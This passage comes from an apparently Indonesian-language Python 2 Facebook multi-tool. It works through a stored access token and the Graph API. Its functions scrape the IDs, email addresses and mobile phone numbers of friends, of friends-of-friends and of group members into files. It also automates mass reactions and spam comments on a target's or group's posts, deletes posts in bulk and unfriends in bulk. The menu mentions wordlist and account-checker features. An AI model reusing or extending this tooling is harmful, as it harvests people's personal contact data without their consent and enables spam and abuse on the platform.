print 40 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromteman.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def emailfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] Kesalahan terjadi'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def hpfrom_teman():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Belum berteman'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 40 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman)
print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Kesalahan saat membuat file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Bot Reactions Target Post'
print '\x1b[1;37;40m2. Bot Reactions Grup Post'
print '\x1b[1;37;40m3. Bot Komen Target Post'
print '\x1b[1;37;40m4. Bot Komen Grup Post'
print '\x1b[1;37;40m5. Mass delete Post'
print '\x1b[1;37;40m6. Terima permintaan pertemanan'
print '\x1b[1;37;40m7. Hapus pertemanan'
print '\x1b[1;31;40m0. Kembali'
print
bot_pilih()
def bot_pilih():
bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Jangan kosong'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. \x1b[1;97mLike'
print '\x1b[1;37;40m2. \x1b[1;97mLove'
print '\x1b[1;37;40m3. \x1b[1;97mWow'
print '\x1b[1;37;40m4. \x1b[1;97mHaha'
print '\x1b[1;37;40m5. \x1b[1;97mSedih'
print '\x1b[1;37;40m6. \x1b[1;97mMarah'
print '\x1b[1;31;40m0. Kembali'
print
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Jangan kosong'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID Tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print '\x1b[1;91m[!] Tidak ada permintaan pertemanan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Terhenti'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Buat postingan'
print '\x1b[1;37;40m2. Buat Wordlist'
print '\x1b[1;37;40m3. Akun Checker'
print '\x1b[1;37;40m4. Lihat daftar grup'
print '\x1b[1;37;40m5. Profile Guard'
print
print '\x1b[1;97m ->Coming soon<-'
print
print '\x1b[1;31;40m0. Kembali'
print
pilih_lain()
def pilih_lain():
other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Jangan kosong'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
